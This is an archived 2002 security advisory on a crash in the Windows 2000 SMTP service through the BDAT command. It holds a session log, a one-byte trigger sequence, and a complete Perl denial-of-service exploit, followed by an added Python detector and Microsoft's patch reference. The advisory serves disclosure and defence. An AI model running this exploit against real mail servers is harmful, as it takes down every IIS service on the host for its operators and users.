windows 2000 smtp DoS



8th Mar 2002 [SBWID-5174]
COMMAND

	windows 2000 smtp DoS

SYSTEMS AFFECTED

	Windows 2000 SP1, SP2

PROBLEM

	H D Moore [http://www.digitaloffense.net] posted:

	I discovered a way to crash the Win2K smtp service via the BDAT command,
	causing inetinfo to die with an access violation.

	...
	

	Here is a brief session log showing the bug:
	

	---
	Trying 192.168.0.58...
	Connected to 192.168.0.58.
	Escape character is '^]'.
	220 shattered Microsoft ESMTP MAIL Service, Version: 5.0.2195.3779 ready at Mon, 12 Nov 2001 23:33:28 -0600
	HELO BISH
	250 shattered Hello [192.168.0.169]
	MAIL FROM: ERUSOLCSIDLLUF
	250 2.1.0 ERUSOLCSIDLLUF@shattered....Sender OK
	RCPT TO: PLUCYLLIS
	250 2.1.5 PLUCYLLIS@shattered
	BDAT 7
	LETRAC AUTH LOGIN
	250 CHUNK received OK, 7 Octets
	334 VXNlcm5hbWU6
	Tm90IGFub3RoZXIgbm90Y2ggb24gY3VscCdzIGJlZHBvc3Q=
	334 UGFzc3dvcmQ6
	WW91IGNhbiBnbyBhaGVhZCBhbmQgY3Jhc2ggbm93Li4u
	501 5.7.3 Cannot decode password
	500 5.3.3 Unrecognized command

	<session hangs here>
	^]
	telnet> quit
	Connection closed.
	hdm@sliver:~ >
	---

	

	And here is the event log entry:
	

	Event Type:     Information
	Event Source:   Application Popup
	Event Category: None
	Event ID:       26
	User:           N/A
	Computer:       SHATTERED
	Description:
	Application popup: inetinfo.exe - Application Error : The instruction at "0x67849cce" referenced memory at "0x7fb0f000". The memory could not be "read".

	Click on OK to terminate the program
	Click on CANCEL to debug the program
	---

	

	Basically, placing AUTH LOGIN after the bytes of a BDAT command, then
	hitting enter a few times crashes the service. The user/pass was not
	needed and the BDAT command can be used with only 1 byte if so wished.
	For instance, the following would work:
	

	BDAT 1<cr>
	XAUTH LOGIN<cr>
	(output from auth login)
	<cr>
	<cr>

	

	

	Exploit:
	=======

	#!/usr/bin/perl -w
	##################
	#
	#
	#   URL: http://www.digitaloffense.net/
	# EMAIL: hdm@digitaloffense.net
	# USAGE: ./mssmtp_dos.pl <target ip>
	#
	# Summary:
	#
	#        The Microsoft Windows 2000 Internet Mail Service is vulnerable to a
	#        Denial of Service attack through the BDAT command. If exploited, this
	#        vulnerability will cause any and all services running under IIS (the
	#        inetinfo.exe process) to become unavailable.
	#
	#
	# Solution:
	#
	#        http://www.microsoft.com/technet/security/bulletin/MS02-012.asp
	#

	use IO::Socket;

	my $target = shift() || "127.0.0.1";
	my $port = 25;
	my $rcpt = "Administrator";
	my $from = "crash\@burn.com";

	my $sock = IO::Socket::INET->new (
	                                    PeerAddr => $target,
	                                    PeerPort => $port,
	                                    Proto => 'tcp'
	                                 ) || die "could not connect: $!";

	# Read the greeting and stop unless the server answered with a 2xx reply.
	my $banner = <$sock>;
	if ($banner !~ /^2.*/)
	{
	    print STDERR "Error: invalid server response '$banner'.\n";
	    exit(1);
	}

	print $sock "HELO $target\r\n";
	my $resp = <$sock>;

	print $sock "MAIL FROM: $from\r\n";
	$resp = <$sock>;

	print $sock "RCPT TO: $rcpt\r\n";
	$resp = <$sock>;

	# Declare a 4-octet chunk and place AUTH LOGIN directly after those bytes.
	print $sock "BDAT 4\r\n";
	print $sock "b00mAUTH LOGIN\r\n";
	$resp = <$sock>;

	# Empty lines in place of the credentials; the service hangs here and dies.
	print $sock "\r\n";
	print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

	close($sock);
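
	A defender-side check for the pattern shown in the session log and in the one-byte variant above (a BDAT chunk whose declared size is exceeded by data that continues with an AUTH command), added here as an example; it is not part of H D Moore's post or the advisory. It scans the client-to-server half of a captured SMTP session and flags every BDAT/AUTH pairing regardless of the chunk size, so it covers the 7-, 4- and 1-octet forms on this page; the transcripts it scans are constructed from the client lines shown above.

```python
import re
from dataclasses import dataclass

# A BDAT command line: "BDAT <octets>", optionally followed by LAST.
BDAT_RE = re.compile(rb"^BDAT\s+(\d+)(?:\s+LAST)?\s*$", re.IGNORECASE)

@dataclass
class Finding:
    line_no: int      # 1-based index of the offending BDAT line
    chunk_size: int   # octets the client declared
    trailing: bytes   # what the server will parse as the next command

def scan_session(transcript):
    """Scan the client->server half of an SMTP session (bytes) for a BDAT
    chunk whose declared size is exceeded by data that continues with AUTH."""
    lines = transcript.splitlines(keepends=True)
    findings = []
    i = 0
    while i < len(lines):
        m = BDAT_RE.match(lines[i].rstrip(b"\r\n"))
        if not m:
            i += 1
            continue
        size = int(m.group(1))
        # Consume raw octets after the BDAT line until the declared size is met.
        buf, j = b"", i + 1
        while len(buf) < size and j < len(lines):
            buf += lines[j]
            j += 1
        # Octets beyond the declared size are the next command in the server's eyes.
        command = buf[size:].strip(b"\r\n")
        if command.upper().startswith(b"AUTH"):
            findings.append(Finding(i + 1, size, command))
        i = j
    return findings

# Constructed transcripts: one replays the client side of the session log above, one is a clean CHUNKING transfer.
ADVISORY_SESSION = (
    b"HELO BISH\r\n"
    b"MAIL FROM: ERUSOLCSIDLLUF\r\n"
    b"RCPT TO: PLUCYLLIS\r\n"
    b"BDAT 7\r\n"
    b"LETRAC AUTH LOGIN\r\n"
)
BENIGN_SESSION = (
    b"BDAT 11 LAST\r\n"
    b"Hello world\r\n"
    b"QUIT\r\n"
)
```

Run over a mail gateway's client-side capture, a non-empty result from scan_session is the signal to alert on; the benign transcript shows that correctly sized chunks produce no finding.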

	

SOLUTION

	

	http://www.microsoft.com/technet/security/bulletin/MS02-012.asp

	

	

